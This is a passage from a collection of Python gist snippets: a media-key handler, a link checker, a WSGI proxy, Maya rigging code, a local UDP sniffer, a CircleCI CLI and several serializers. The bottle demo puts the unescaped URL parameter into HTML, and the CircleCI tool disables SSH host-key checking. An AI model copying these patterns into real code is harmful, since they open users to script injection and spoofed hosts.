User.objects.get(username=username)
return generate_random_username(length=length, chars=chars, split=split, delimiter=delimiter)
except User.DoesNotExist:
return username;
```
#### File: hard-gists/2870240/snippet.py
```python
import subprocess
# PyObjC-related imports
from AppKit import NSApplication, NSSystemDefined
from PyObjCTools import AppHelper
KEY_UP = 11
class KeySocketApp(NSApplication):
repeated = False
def sendEvent_(self, event):
if event.type() is NSSystemDefined and event.subtype() is 8:
data = event.data1()
keyCode = (data & 0xFFFF0000) >> 16
keyFlags = (data & 0x0000FFFF)
keyState = (keyFlags & 0xFF00) >> 8
keyRepeat = keyFlags & 0x1
if keyRepeat and keyState is not KEY_UP:
if keyCode == 20:
self.repeated = True
print "prev"
subprocess.call(['cmus-remote', '-k', '-10'])
elif keyCode == 19:
self.repeated = True
print "forward"
subprocess.call(['cmus-remote', '-k', '+10'])
if keyState is KEY_UP:
if self.repeated:
self.repeated = False
elif keyCode == 20:
print "PREV"
subprocess.call(['cmus-remote', '-r'])
elif keyCode == 16:
print "PLAY"
subprocess.call(['cmus-remote', '-u'])
elif keyCode == 19:
print "FORWARD"
subprocess.call(['cmus-remote', '-n'])
if __name__ == '__main__':
app = KeySocketApp.sharedApplication()
AppHelper.runEventLoop()
```
#### File: hard-gists/2872d7f994d192188970408980267e6e/snippet.py
```python
from bs4 import BeautifulSoup,SoupStrainer
import urllib.request
import colorama,re,queue,threading
from colorama import Fore
from urllib.parse import *
class check_link():
def __init__(self,address):
self.address=address
def check(self,address):
try:
req=urllib.request.Request(url=address)
resp=urllib.request.urlopen(req)
            if resp.status in [400,404,403,408,409,501,502,503]:print (Fore.RED+str(resp.status)+"-"+resp.reason+"-->"+address)
else: print (Fore.GREEN+"no problem in-->"+address)
except Exception as e:
print (Fore.YELLOW+"{}-{}".format(e,address))
pass
def pattern_adjust(a):
try:
if re.match('^#' ,a):return 0
r=urlsplit(a)
if r.scheme=='' and (r.netloc!='' or r.path!=''):
d=urlunsplit(r)
if re.match('^//' ,d):
m= re.search('(?<=//)\S+', d)
d=m.group(0)
m="https://"+d
return m
elif r.scheme=='' and r.netloc=='':
return address+a
else:return a
except Exception as e:
pass
def extract_link(address):
tags= {'a':'href', 'img':'src', 'script':'src', 'link':'href' }
for key,value in iter(tags.items()):
try:
res=urllib.request.urlopen(address)
response=res.read().decode('utf-8') #needs improvement
for link in BeautifulSoup(response,"html.parser",parse_only=SoupStrainer(key)):
if link.has_attr(value):
p=pattern_adjust(link[value])
if p!=0 and str(p)!='None':
newcheck=check_link(p)
newcheck.check(p)
if p not in hyperlinks:
hyperlinks.add(p)
if website.split('.')[1] in p:#needs improvement
                            if not p.endswith(('.png','.jpeg','.js','jpg')):
q.put(p)
except Exception as e:
print (e,address)
def threader():
while True:
value=q.get()
result=extract_link(value)
q.task_done()
if __name__=="__main__":
colorama.init()
q=queue.Queue()
global hyperlinks,website
hyperlinks=set()
website=input("Please enter the website address: ")
for x in range(30):
t=threading.Thread(target=threader)
t.deamon=True
t.start()
q.put(website.strip())
q.join()
```
#### File: hard-gists/2888380/snippet.py
```python
import bottle
from wsgiproxy.app import WSGIProxyApp
# Remove "hop-by-hop" headers (as defined by RFC2613, Section 13)
# since they are not allowed by the WSGI standard.
FILTER_HEADERS = [
'Connection',
'Keep-Alive',
'Proxy-Authenticate',
'Proxy-Authorization',
'TE',
'Trailers',
'Transfer-Encoding',
'Upgrade',
]
root = bottle.Bottle()
proxy_app = WSGIProxyApp("http://localhost/")
def wrap_start_response(start_response):
def wrapped_start_response(status, headers_out):
# Remove "hop-by-hop" headers
headers_out = [(k,v) for (k,v) in headers_out
if k not in FILTER_HEADERS]
return start_response(status, headers_out)
return wrapped_start_response
def wrapped_proxy_app(environ, start_response):
start_response = wrap_start_response(start_response)
return proxy_app(environ, start_response)
root.mount(wrapped_proxy_app,"/proxytest")
@root.route('/hello/:name')
def index(name='World'):
return '<b>Hello %s!</b>' % name
bottle.debug(True)
bottle.run(app=root, host='localhost', port=8080)
```
#### File: hard-gists/2975718/snippet.py
```python
from __future__ import absolute_import
from django.core.management.base import BaseCommand
class Command(BaseCommand):
def run_from_argv(self, argv):
self._argv = argv
self.execute()
def handle(self, *args, **options):
from scrapy.cmdline import execute
execute(self._argv[1:])
```
#### File: hard-gists/2986210/snippet.py
```python
import gtk, sys
def tohex(c):
#Convert to hex string
#little hack to fix bug
s = ['#',hex(int(c[0]*256))[2:].zfill(2),hex(int(c[1]*256))[2:].zfill(2),hex(int(c[2]*256))[2:].zfill(2)]
for item in enumerate(s):
if item[1]=='100':
s[item[0]]='ff'
print s
return ''.join(s)
csd = gtk.ColorSelectionDialog('Gnome Color Chooser')
cs = csd.colorsel
cs.set_has_opacity_control(True)
cs.set_current_alpha(65536)
if csd.run()!=gtk.RESPONSE_OK:
print 'No color selected.'
sys.exit()
c = cs.get_current_color()
print "Color Values:"
print 'red:',c.red
print 'green:',c.green
print 'blue:',c.blue
print 'alpha:',cs.get_current_alpha()
print "Hex Codes:"
print tohex((c.red/65536.0, c.green/65536.0, c.blue/65536.0))
```
#### File: hard-gists/2996448/snippet.py
```python
import sublime
import sublime_plugin
class SublimeBlockCursor(sublime_plugin.EventListener):
    def view_is_widget(self, view):
settings = view.settings()
return bool(settings.get('is_widget'))
def show_block_cursor(self, view):
validRegions = []
for s in view.sel():
if s.a != s.b:
continue
validRegions.append(sublime.Region(s.a, s.a + 1))
        if validRegions:
view.add_regions('SublimeBlockCursorListener', validRegions, 'block_cursor')
else:
view.erase_regions('SublimeBlockCursorListener')
def on_selection_modified(self, view):
if view.settings().get('is_widget'):
view.erase_regions('SublimeBlockCursorListener')
return
self.show_block_cursor(view)
def on_deactivated(self, view):
view.erase_regions('SublimeBlockCursorListener')
def on_activated(self, view):
self.show_block_cursor(view)
```
#### File: hard-gists/29c51b6997c3e3bff568/snippet.py
```python
from numpy import linspace
from scipy.integrate import odeint
#import pylab as pyl
import matplotlib.pyplot as plt
# define constants
init_cond = [0.3, -0.1]
t_init = 0.0
t_final = 10.0
time_step = 0.005
num_data =int((t_final-t_init)/time_step)
k_spring = 0.1
c_damper = 0.5
# define ordinary differential equation
def mass_spring_damper(state, t):
x, x_dot = state
f = [x_dot,
-k_spring*x - c_damper*x_dot]
return f
# integrate
t_all = linspace(t_init, t_final, num_data)
y_all = odeint(mass_spring_damper, init_cond, t_all)
# plots
fig = plt.figure()
plt.plot(t_all,y_all[:,0],'b-')
plt.plot(t_all,y_all[:,1],'r--')
plt.legend(['x [m]','dx/dt [m/s]'])
plt.xlabel('time [s]')
plt.ylabel('state')
```
#### File: hard-gists/2a5d283b0d279ea96c26/snippet.py
```python
from concurrent.futures import as_completed, ThreadPoolExecutor
from urllib.request import urlopen
import re
import sys
DEFAULT_REGEX = r'<input type="text" id="nacional" value="([^"]+)"/>'
CURRENCY = {
'dolar': 'http://dolarhoje.com/',
'euro': 'http://eurohoje.com/',
'libra': 'http://librahoje.com/',
'peso': 'http://pesohoje.com/'
}
def exchange_rate(url):
response = urlopen(url).read().decode('utf-8')
result = re.search(DEFAULT_REGEX, response)
if result:
return result.group(1)
def run_threads():
with ThreadPoolExecutor(max_workers=len(CURRENCY)) as executor:
waits = {
executor.submit(exchange_rate, url): currency
for currency, url in CURRENCY.items()
}
for future in as_completed(waits):
currency = waits[future]
print('{}: R${}'.format(currency, future.result()))
def run_serial():
for currency, url in CURRENCY.items():
print('{}: R${}'.format(currency, exchange_rate(url)))
if __name__ == '__main__':
"""
To run serial
$ python multi_requests.py
To run multithread
$ python multi_requests.py threads
"""
if len(sys.argv) > 1 and sys.argv[1] == 'threads':
run_threads()
else:
run_serial()
```
#### File: hard-gists/2aa430e00dde0cf905a9/snippet.py
```python
import re
import anyconfig
from maya.api import OpenMaya as OpenMaya2
##############################################################################
PARENT_CONS_TYPE_ID = OpenMaya2.MTypeId(0x44504152)
##############################################################################
def get_node(x):
try:
y = OpenMaya2.MGlobal.getSelectionListByName("{}*".format(x))
except RuntimeError:
return ''
try:
return y.getDagPath(0)
except:
return y.getDependNode(0)
def get_rotation(dag_path, space=OpenMaya2.MSpace.kWorld):
tra = OpenMaya2.MFnTransform(dag_path)
return tra.rotation(space, True) # as quat
def set_rotation(dag_path, v, space=OpenMaya2.MSpace.kWorld):
tra = OpenMaya2.MFnTransform(dag_path)
    return tra.setRotation(v, space)
def get_translation(dag_path, space=OpenMaya2.MSpace.kWorld):
tra = OpenMaya2.MFnTransform(dag_path)
return tra.translation(space)
def set_translation(dag_path, v, space=OpenMaya2.MSpace.kWorld):
tra = OpenMaya2.MFnTransform(dag_path)
return tra.setTranslation(v, space)
def match(def_file_name="test.yaml", domain="match_guide_on_bone"):
map = anyconfig.load(def_file_name)
for m in map[domain]:
do_match(m)
def do_match(entry):
d = get_node(entry['dst'])
s = get_node(entry['src'])
if not d or not s:
print('nothing todo with {}'.format(entry))
return
v_s = get_translation(s)
set_translation(d, v_s)
def connect_on_deformer(def_file_name="test.yaml", domain="bone_on_deformer"):
map = anyconfig.load(def_file_name)
for m in map[domain]:
do_connect(m)
plug_exp = re.compile(
"(?P<parent_name>\w+)\[(?P<parent_idx>\d+)\]\.(?P<target_name>\w+)")
def _get_plug(node, name):
if '.' in name:
m = plug_exp.match(name)
container_plug = node.findPlug(m.group('parent_name'), False)
if container_plug.isArray:
# mind glitch, setting connection index
# with "selectAncestorLogicalIndex"
kid_attr = container_plug.attribute()
kid_plug = node.findPlug(m.group('target_name'), False)
kid_plug.selectAncestorLogicalIndex(
int(m.group('parent_idx')), kid_attr)
else:
kid_plug = node.findPlug(name, False)
return kid_plug
def do_connect(entry):
d = get_node(entry['dst'])
s = get_node(entry['src'])
if not d or not s:
print('nothing todo with {}'.format(entry))
return
cons_name = "{}_parentConstraint".format(d)
cons_node = OpenMaya2.MFnDependencyNode()
cons_node.create(PARENT_CONS_TYPE_ID, cons_name)
x = get_node(cons_name).node()
dag_mod = OpenMaya2.MDagModifier()
dag_mod.reparentNode(x, d.node())
dag_mod.doIt()
src_node = OpenMaya2.MFnDependencyNode().setObject(s.node())
dst_node = OpenMaya2.MFnDependencyNode().setObject(d.node())
d2c = [
["jointOrient", "constraintJointOrient"],
["rotatePivot", "constraintRotatePivot"],
["parentInverseMatrix[0].parentInverseMatrix",
"constraintParentInverseMatrix"],
["rotateOrder", "constraintRotateOrder"],
["rotatePivotTranslate", "constraintRotateTranslate"]
]
s2c = [
["translate", "target[0].targetTranslate"],
["rotate", "target[0].targetRotate"],
["scale", "target[0].targetScale"],
["parentMatrix[0].parentMatrix", "target[0].targetParentMatrix"],
# ["instObjGroups[0]", ""],
["rotatePivot", "target[0].targetRotatePivot"],
["rotatePivotTranslate", "target[0].targetRotateTranslate"],
["rotateOrder", "target[0].targetRotateOrder"],
["jointOrient", "target[0].targetJointOrient"],
["segmentScaleCompensate", "target[0].targetScaleCompensate"],
["inverseScale", "target[0].targetInverseScale"]
]
c2d = [
# "inverseScale",
# "drawOverride",
# "scale",
# "worldMatrix[0]",
# "lockInfluenceWeights",
# "objectColorRGB",
# "message",
# "bindPose",
["constraintTranslateX", "translateX"],
["constraintTranslateY", "translateY"],
["constraintTranslateZ", "translateZ"],
["constraintRotateX", "rotateX"],
["constraintRotateY", "rotateY"],
["constraintRotateZ", "rotateZ"]
# ["rotateOrder]"
# "parentInverseMatrix[0]",
# "rotatePivot",
# "rotatePivotTranslate",
# "jointOrient"
]
def _conn(map_array, src, dst):
for a in map_array:
# print a[0], a[1]
src_plug = _get_plug(src, a[0])
dst_plug = _get_plug(dst, a[1])
dg_mod.connect(src_plug, dst_plug)
def offset(node, pos, rot):
offset_plug_p_x = _get_plug(node, "target[0].targetOffsetTranslateX")
offset_plug_p_y = _get_plug(node, "target[0].targetOffsetTranslateY")
offset_plug_p_z = _get_plug(node, "target[0].targetOffsetTranslateZ")
offset_plug_r_x = _get_plug(node, "target[0].targetOffsetRotateX")
offset_plug_r_y = _get_plug(node, "target[0].targetOffsetRotateY")
offset_plug_r_z = _get_plug(node, "target[0].targetOffsetRotateZ")
offset_plug_p_x.setDouble(pos[0])
offset_plug_p_y.setDouble(pos[1])
offset_plug_p_z.setDouble(pos[2])
if (not rot[0]):
rot[0] = 0
if (not rot[1]):
rot[1] = 0
if (not rot[2]):
rot[2] = 0
offset_plug_r_x.setDouble(rot[0])
offset_plug_r_y.setDouble(rot[1])
offset_plug_r_z.setDouble(rot[2])
print rot
# dg_mod, must call doIt() later.
dg_mod = OpenMaya2.MDGModifier()
# dst to cns, for some settings
_conn(d2c, dst_node, cons_node)
# src to cos
_conn(s2c, src_node, cons_node)
# cons to dst
_conn(c2d, cons_node, dst_node)
print d
####################################################################
# store transforms for offset
posspace = OpenMaya2.MSpace.kTransform
rotspace = OpenMaya2.MSpace.kTransform
original_pos = get_translation(d, posspace)
original_rot = get_rotation(d, rotspace)
joint_orient_x = _get_plug(dst_node, "jointOrientX").asFloat()
joint_orient_y = _get_plug(dst_node, "jointOrientY").asFloat()
joint_orient_z = _get_plug(dst_node, "jointOrientZ").asFloat()
joint_orient_eul = OpenMaya2.MEulerRotation(
joint_orient_x, joint_orient_y, joint_orient_z)
joint_orient = OpenMaya2.MQuaternion().setValue(joint_orient_eul)
dg_mod.doIt()
# maintain offset
_pos = get_translation(d, posspace)
_rot = get_rotation(d, rotspace)
diff_pos = original_pos - _pos
diff_rot = original_rot * _rot.invertIt()
diff_pos = diff_pos.rotateBy(joint_orient.invertIt()).rotateBy(diff_rot)
offset(cons_node, diff_pos, diff_rot.asEulerRotation())
```
#### File: hard-gists/2da57d5b039aab4da7ce/snippet.py
```python
from pcapy import open_live
from bencode import bdecode
from socket import inet_aton, inet_ntoa
import dpkt
import sys
# Defaults to 51413 (transmission's default port)
filter_port = 51413
# Callback function for parsing packets
def parse_udp(hdr, data):
global filter_port
try:
eth = dpkt.ethernet.Ethernet(data)
except Exception:
return
if eth.type != dpkt.ethernet.ETH_TYPE_IP:
return
ip = eth.data
if ip.p == dpkt.ip.IP_PROTO_UDP and filter_port in (ip.data.dport, ip.data.sport):
payload = ip.data.data
else:
return
# Print plain text bencoded request.
try:
data = bdecode(payload)
print "%s:%d -> %s:%d (%d bytes): %s\n" % (inet_ntoa(ip.src), ip.data.sport,
inet_ntoa(ip.dst), ip.data.dport, len(payload), data)
except Exception:
return
def main(argv):
global filter_port
if len(argv) == 1:
try:
filter_port = int(argv[0])
except ValueError:
print "Invalid port number"
sys.exit(1)
print "[+] Starting sniffer"
pcap_obj = open_live("eth0", 65536, False, True)
try:
pcap_obj.loop(-1, parse_udp)
except KeyboardInterrupt:
print "[!] Exiting"
sys.exit(0)
if __name__ == '__main__':
main(sys.argv[1:])
```
#### File: hard-gists/2fe1c16a7cc27ef01c1f/snippet.py
```python
import os
import pprint
import subprocess
import sys
from optparse import make_option
from urllib import quote_plus
from urlparse import urljoin
import dateutil.parser
import requests
from django.conf import settings
from django.core.management import BaseCommand, CommandError
from six import python_2_unicode_compatible
ORGANIZATION_NAME = 'org'
PROJECT_NAME = 'project'
class Command(BaseCommand):
help = 'CircleCI Command Line Interface'
option_list = BaseCommand.option_list + (
make_option('--ssh', action='store_true', default=False),
make_option('--cancel', action='store_true', default=False),
make_option('--artifacts', action='store_true', default=False),
make_option('--me', action='store_true', default=False),
make_option('--cancel-redundant-builds', action='store_true'),
make_option('--start'),
)
def __init__(self):
super(Command, self).__init__()
token = getattr(settings, 'CIRCLECI_TOKEN', None) or os.environ.get('CIRCLECI_TOKEN')
if not token:
raise CommandError('You need to specify a circleci access token either in your settings or '
'in your environment')
self.cci = CircleCi(token)
def handle(self, build_id=None, *args, **options):
# Some commands don't require a build
if options['me']:
pprint.pprint(self.cci.me)
return 0
elif options['cancel_redundant_builds']:
self.cancel_redundant_builds()
return 0
elif options['start']:
self.start_build(options['start'])
return 0
# From here on, we need a build number to operate
if not build_id:
error('Please specify a build number.')
build = self.cci.build(build_id)
if options['ssh']:
build_dict = build.data
if not build_dict['ssh_enabled']:
error('This build does not have SSH enabled.')
node = build_dict['node'][0]
ip_addr = node['public_ip_addr']
port = node['port']
cmd = ['ssh', 'ubuntu@{}'.format(ip_addr),
'-p', str(port),
'-o', 'UserKnownHostsFile /dev/null',
'-o', 'StrictHostKeyChecking=no']
print('Running: {}'.format(cmd))
p = subprocess.Popen(cmd, stdout=sys.stdout, stdin=sys.stdin, stderr=sys.stderr)
p.communicate()
elif options['cancel']:
build.cancel()
elif options['artifacts']:
artifacts = build.artifacts
for a in artifacts:
print(a)
print('{} artifact(s).'.format(len(artifacts)))
else:
pprint.pprint(self.cci.build(build_id))
def cancel_redundant_builds(self):
active_builds = {}
for build in self.cci.builds:
if not build.active:
continue
if 'branch' not in build.data:
print('Got weird build #{} without a branch...?'.format(build.build_num))
continue
if not build.queued_at:
print('Looks like build #{} was not queued...?'.format(build.build_num))
pprint.pprint(build)
continue
branch = build.data['branch']
active_builds.setdefault(branch, []).append((build.queued_at, build))
for branch, builds in active_builds.iteritems():
if len(builds) > 1:
builds = sorted(builds)
for queued_at, build in builds[:-1]:
build.cancel()
def start_build(self, branch):
self.cci.post_project('tree/{}'.format(quote_plus(branch)))
class CircleCi(object):
BASE_URL = 'https://circleci.com/api/v1/'
def __init__(self, access_token):
self.token = access_token
@property
def project_base_path(self):
return 'project/{}/{}/'.format(ORGANIZATION_NAME, PROJECT_NAME)
def request(self, method, path, **kwargs):
kwargs.setdefault('params', {}).update(**{'circle-token': self.token})
kwargs.setdefault('headers', {}).update(**{'Accept': 'application/json'})
url = urljoin(self.BASE_URL, path)
print('\x1b[1m{} {}\x1b[0m'.format(method, url))
r = requests.request(method, url, **kwargs)
r.raise_for_status()
return r
def get(self, *args, **kwargs):
r = self.request('GET', *args, **kwargs)
return r.json()
def get_project(self, path='', *args, **kwargs):
path = urljoin(self.project_base_path, path)
return self.get(path, *args, **kwargs)
def post(self, *args, **kwargs):
return self.request('POST', *args, **kwargs)
def post_project(self, path, *args, **kwargs):
path = urljoin(self.project_base_path, path)
return self.post(path, *args, **kwargs)
@property
def builds(self):
builds_data = self.get_project()
return [CircleCiBuild(self, data=build) for build in builds_data]
@property
def me(self):
return self.get('me')
def build(self, build_num):
return CircleCiBuild(self, build_num)
@python_2_unicode_compatible
class CircleCiBuild(object):
def __init__(self, api, build_num=None, data=None):
self.api = api
self.build_num = int(build_num or data['build_num'])
self._data = data or None
def __str__(self):
commits = self.data.get('all_commit_details')
subject = commits[-1]['subject'] if commits and len(commits) > 0 else '(No subject)'
return u'#{} {} {} {} {}'.format(self.build_num, self.queued_at, self.data['status'], self.data['branch'], subject)
def __repr__(self):
self_str = unicode(self).encode('ascii', 'backslashreplace')
return '<{}: {}>'.format(self.__class__.__name__, self_str)
def cancel(self):
print('Canceling build: {}'.format(self))
return self.api.post_project('{}/cancel'.format(self.build_num))
@property
def queued_at(self):
queued_at = self.data.get('usage_queued_at')
return queued_at and dateutil.parser.parse(queued_at)
@property
def data(self):
if self._data is None:
self._data = self.api.get_project('{}'.format(self.build_num))
return self._data
@property
def artifacts(self):
artifacts = self.api.get_project('{}/artifacts'.format(self.build_num))
return [a['url'] for a in artifacts]
@property
def status(self):
return self.data['status']
@property
def active(self):
if self.status in ['success', 'timedout', 'fixed', 'canceled', 'failed', 'not_run', 'retried', 'no_tests']:
return False
if self.status in ['not_running', 'scheduled', 'running', 'queued']:
return True
raise CommandError('Unknown CircleCI status: {!r}'.format(self.status))
def error(s, *args, **kwargs):
print(s.format(*args, **kwargs))
sys.exit(1)
```
#### File: hard-gists/3009143/snippet.py
```python
import json
import datetime
from decimal import Decimal
from mongoengine.queryset import queryset_manager
from mongoengine.queryset import QuerySet
from mongoengine.base import BaseList, BaseDict, ObjectId
def list_encoder(inst, obj, field, force_string=False):
"""
Encoder for iterable datatypes.
"""
if force_string:
return [str(x) for x in obj]
return [inst.default(x, field) for x in obj]
def dict_encoder(inst, obj, field, force_string=False):
"""
Encoder for dictinary like data type
"""
data = {}
for key in obj.keys():
if force_string:
data[key] = str(obj[key])
else:
data[key] = inst.default(obj[key], field)
return data
def data_encoder(inst, obj, field, force_string=False):
"""
Encoder for regular data types.
"""
if force_string:
return str(obj)
return obj
def object_id_encoder(inst, obj, field, force_string=False):
"""
Encoder for ObjectId
"""
return str(obj)
def model_encoder_factory(
fields={},
extra_encoders={},
reference_only_fields={}):
"""
This will return a custom json.JSONEncoder class that is will be
able to serialize a mongoengine queryset, or a iterable of
querysets.
fields: A dictionary, keys are data types, values are lists of
fields for each data types, to be serialized. Fields can be
attributes or object methods.
example:
{
AdCategory: ['title', 'slug'],
Region: ['name'],
}
extra_encoders: Contribute or override default encoders.
example:
{
MySpecialDataType: my_function_that_encodes,
MyOtherSpecialDataType: my_other_function_that_encodes,
}
reference_only_fields: Use this to avoid circular relations. This
will result in the serialized data to contain a string
representation of the object instead of a json representation.
{
Region: ['neighboring_regions'],
}
>>> from .models import AdCategory
>>> from .geo.models import Region
>>> from .utils import model_encoder_factory
>>> import json
>>> data = {
... 'regions': Region.objects.all(),
... 'categories': AdCategory.objects.all(),
... }
>>> fields = {
... Region: ['name' ],
... AdCategory: ['title', ],
... }
>>> enc = model_encoder_factory(fields=fields)
>>> json.dumps(data, cls=enc)
"""
# These encoders are matched by datatype. Still need to figure out
# whether it's faster to match using a hash or with isinstance().
encoders = {
BaseList: list_encoder,
QuerySet: list_encoder,
list: list_encoder,
tuple: list_encoder,
BaseDict: dict_encoder,
dict: dict_encoder,
int: data_encoder,
long: data_encoder,
unicode: data_encoder,
Decimal: data_encoder,
datetime.datetime: data_encoder,
datetime.date: data_encoder,
ObjectId: object_id_encoder,
}
# When creating your encoder by calling this factory, you may
# supply an extra_encoders parameter that will either contribute
# to, or override existing encoders.
encoders.update(extra_encoders)
# Caching keys. Not sure if it's necessary to be honest.
encoders_keys = encoders.keys()
class Encoder(json.JSONEncoder):
def default(self, obj, field=None):
"""
This a function is called by json.dumps
"""
# Get object type
obj_type = type(obj)
if obj_type in encoders_keys:
# If the object type exists in encoders, checker
# whether it is included in reference_only_fields, if
# yes, the encoder will force the result to be a
# string (or a list of strings) instead of an object,
# or list of objects.
force_string=False
if (reference_only_fields and obj
and obj_type in reference_only_fields
and field in reference_only_fields[obj_type]):
force_string = True
# Get the encoder and return its result. (The encoder
# is given self, because it may recurse for iterable
# items.)
return encoders[obj_type](
self,
obj,
field,
force_string=force_string,
)
# Now if the object type exists in fields, and the obj has
# not matched any datatypes in the list of encoders,
# create a dictionary of {field: value}.
if obj_type in fields:
data = {}
for field in fields[obj_type]:
# This is called again because it needs to convert
# the value using encoders.
data[field] = self.default(
getattr(obj, field),
field,
)
return data
elif callable(obj):
# If a supplied field is a callable, return the
# callable result.
return obj()
else:
# Finally if the field doesn't match anything, return
# it's string representation.
return {str(obj_type): None}
return Encoder
class Serializable(object):
"""
Your model can inherit from Serializable, it will get the
json_tree method that will automatically use the model's _fields
to attempt serialization.
example:
MyModel(Document, Serializable)
title = StringField()
then you can get all documents in a json structure by calling
MyModel.json_tree()
You should probably override the json_default_query method to
customize the current queryset.
You can also pass a queryset as an argument like so:
MyModel.json_tree(MyModel.objects.filter(title='test'))
"""
@classmethod
def json_default_query(cls):
return cls.objects.all()
@classmethod
def json_tree(cls, qs=None, fields={}, reference_only_fields={}):
if qs == None:
qs = cls.json_default_query()
if not fields:
fields = {cls: cls._fields.keys()}
encoder = model_encoder_factory(
fields=fields,
reference_only_fields=reference_only_fields,
)
return json.dumps(
qs,
cls=encoder,
)
```
#### File: hard-gists/3042651/snippet.py
```python
import os
from django import template
from django.utils.safestring import mark_safe
from django.conf import settings as s
register = template.Library()
def _mtime_suffix(file):
return int(os.stat(s.MEDIA_ROOT + file).st_mtime)
@register.simple_tag
def media_url(file):
return "%s%s?%s" %(s.MEDIA_URL, file, _mtime_suffix(file))
@register.simple_tag
def stylesheet_link(stylesheet):
return mark_safe('<link rel="stylesheet" href="%s%s?%d" type="text/css" />' %(
s.MEDIA_URL,
stylesheet,
_mtime_suffix(stylesheet),
))
@register.simple_tag
def script_link(script):
return mark_safe('<script type="text/javascript" src="%s%s?%d"></script>' %(
s.MEDIA_URL,
script,
_mtime_suffix(script)
))
```
#### File: hard-gists/305322/snippet.py
```python
import cgi
from google.appengine.ext import blobstore
from django.http import HttpResponse
import logging
def get_uploads(request, field_name=None, populate_post=False):
"""Get uploads sent to this handler.
Args:
field_name: Only select uploads that were sent as a specific field.
populate_post: Add the non blob fields to request.POST
Returns:
A list of BlobInfo records corresponding to each upload.
Empty list if there are no blob-info records for field_name.
"""
if hasattr(request,'__uploads') == False:
request.META['wsgi.input'].seek(0)
fields = cgi.FieldStorage(request.META['wsgi.input'], environ=request.META)
request.__uploads = {}
if populate_post:
request.POST = {}
for key in fields.keys():
field = fields[key]
if isinstance(field, cgi.FieldStorage) and 'blob-key' in field.type_options:
request.__uploads.setdefault(key, []).append(blobstore.parse_blob_info(field))
elif populate_post:
request.POST[key] = field.value
if field_name:
try:
return list(request.__uploads[field_name])
except KeyError:
return []
else:
results = []
for uploads in request.__uploads.itervalues():
results += uploads
return results
def send_blob(request, blob_key_or_info, content_type=None, save_as=None):
"""Send a blob-response based on a blob_key.
Sets the correct response header for serving a blob. If BlobInfo
is provided and no content_type specified, will set request content type
to BlobInfo's content type.
Args:
blob_key_or_info: BlobKey or BlobInfo record to serve.
content_type: Content-type to override when known.
save_as: If True, and BlobInfo record is provided, use BlobInfos
filename to save-as. If string is provided, use string as filename.
If None or False, do not send as attachment.
Raises:
ValueError on invalid save_as parameter.
"""
CONTENT_DISPOSITION_FORMAT = 'attachment; filename="%s"'
if isinstance(blob_key_or_info, blobstore.BlobInfo):
blob_key = blob_key_or_info.key()
blob_info = blob_key_or_info
else:
blob_key = blob_key_or_info
blob_info = None
logging.debug(blob_info)
response = HttpResponse()
response[blobstore.BLOB_KEY_HEADER] = str(blob_key)
if content_type:
if isinstance(content_type, unicode):
content_type = content_type.encode('utf-8')
response['Content-Type'] = content_type
else:
del response['Content-Type']
def send_attachment(filename):
if isinstance(filename, unicode):
filename = filename.encode('utf-8')
response['Content-Disposition'] = (CONTENT_DISPOSITION_FORMAT % filename)
if save_as:
if isinstance(save_as, basestring):
send_attachment(save_as)
elif blob_info and save_as is True:
send_attachment(blob_info.filename)
else:
if not blob_info:
raise ValueError('Expected BlobInfo value for blob_key_or_info.')
else:
raise ValueError('Unexpected value for save_as')
return response
```
#### File: hard-gists/3077639/snippet.py
```python
import unicodecsv as csv  # unicodecsv's writer accepts the encoding argument used below
from tools import DynamicCommand # see https://gist.github.com/2724472
class Command(DynamicCommand):
"""
Easily export a model's objects in csv format. In this example the csv can be generated by executing:
./manage.py export your_model
"""
def your_model(self):
from your.app.models import YourModel
meta = {
'file': '/tmp/your_model.csv',
'class': YourModel,
'fields': ('title', 'description') # models fields you want to include
}
self._write_csv(meta)
def _write_csv(self, meta):
"""
:param meta: (dict) keys should be 'file' (string: absolute path), 'class' the Python class
object, 'fields' a list or tuple of field model field names (strings)
"""
f = open(meta['file'], 'w+')
writer = csv.writer(f, encoding='utf-8')
writer.writerow( meta['fields'] )
for obj in meta['class'].objects.all():
row = [unicode(getattr(obj, field)) for field in meta['fields']]
writer.writerow(row)
f.close()
print 'Data written to %s' % meta['file']
```
#### File: hard-gists/3078465/snippet.py
```python
from flask import Blueprint
import converters # module containing the custom converter classes
def add_app_url_map_converter(self, func, name=None):
"""
Register a custom URL map converters, available application wide.
:param name: the optional name of the filter, otherwise the function name
will be used.
"""
def register_converter(state):
state.app.url_map.converters[name or func.__name__] = func
self.record_once(register_converter)
# monkey-patch the Blueprint object to allow addition of URL map converters
Blueprint.add_app_url_map_converter = add_app_url_map_converter
# create the eyesopen Flask blueprint
bp = Blueprint('myblueprint', __name__)
# register the URL map converters that are required
bp.add_app_url_map_converter(converters.FooConverter, 'foo')
bp.add_app_url_map_converter(converters.BarConverter, 'bar')
```
#### File: hard-gists/30839ae0280a5077b8669757e5efa75d/snippet.py
```python
import inspect
import sound
import _ui
import _scene2
def_fmt = '\n\n%sdef %s():\n%s pass\n'
method_fmt = '\n%sdef %s(self):\n%s pass\n'
cls_method_fmt = '\n%sdef %s(cls):\n%s pass\n'
class_fmt = '\n\n%sclass %s:%s\n'
doc_fmt = '%s"""%s"""\n'
def handle_attribute(name, func, indent):
if isinstance(func, int) or isinstance(func, float):
return '\n%s%s = %s\n' % (indent, name, func)
else:
return '\n%s%s = "%s"\n' % (indent, name, func)
def get_info(modul, indentlevel=0, inclass=False):
_f = []
indent = ' ' * indentlevel
for name, func in inspect.getmembers(modul):
if callable(func):
if name == '__getattribute__':
continue
isfunc = 'function' in str(func)
if name == '__new__':
_f.append(cls_method_fmt % (indent, name, indent))
else:
_f.append((def_fmt if isfunc else method_fmt if inclass else class_fmt) % (indent, name, indent))
if not isfunc and not inclass:
get_info(func, indentlevel + 1, True)
else:
if inclass and name == '__doc__': # insert docstring
_f.insert(0, doc_fmt % (indent, func))
else:
_f.append(handle_attribute(name, func, indent))
return _f
def create_func(modul, modname, indentlevel=0, inclass=False):
print "processing %s" % modname
_f = []
indent = ' ' * indentlevel
for name, func in inspect.getmembers(modul):
if callable(func):
if name == '__getattribute__':
continue
isfunc = 'function' in str(func)
_f.append((def_fmt if isfunc else method_fmt if inclass else class_fmt) % (indent, name, indent))
if not isfunc and not inclass:
cls = get_info(func, indentlevel + 1, True)
_f += cls
else:
if name == '__doc__': # insert docstring
_f.insert(0, doc_fmt % (indent, func))
elif name not in ['__name__', '__package__']:
_f.append(handle_attribute(name, func, indent))
open(modname, 'w').write(''.join(_f))
print "processed %s" % modname
if __name__ == "__main__":
create_func(sound, 'sound.py')
create_func(_ui, '_ui.py')
create_func(_scene2, '_scene2.py')
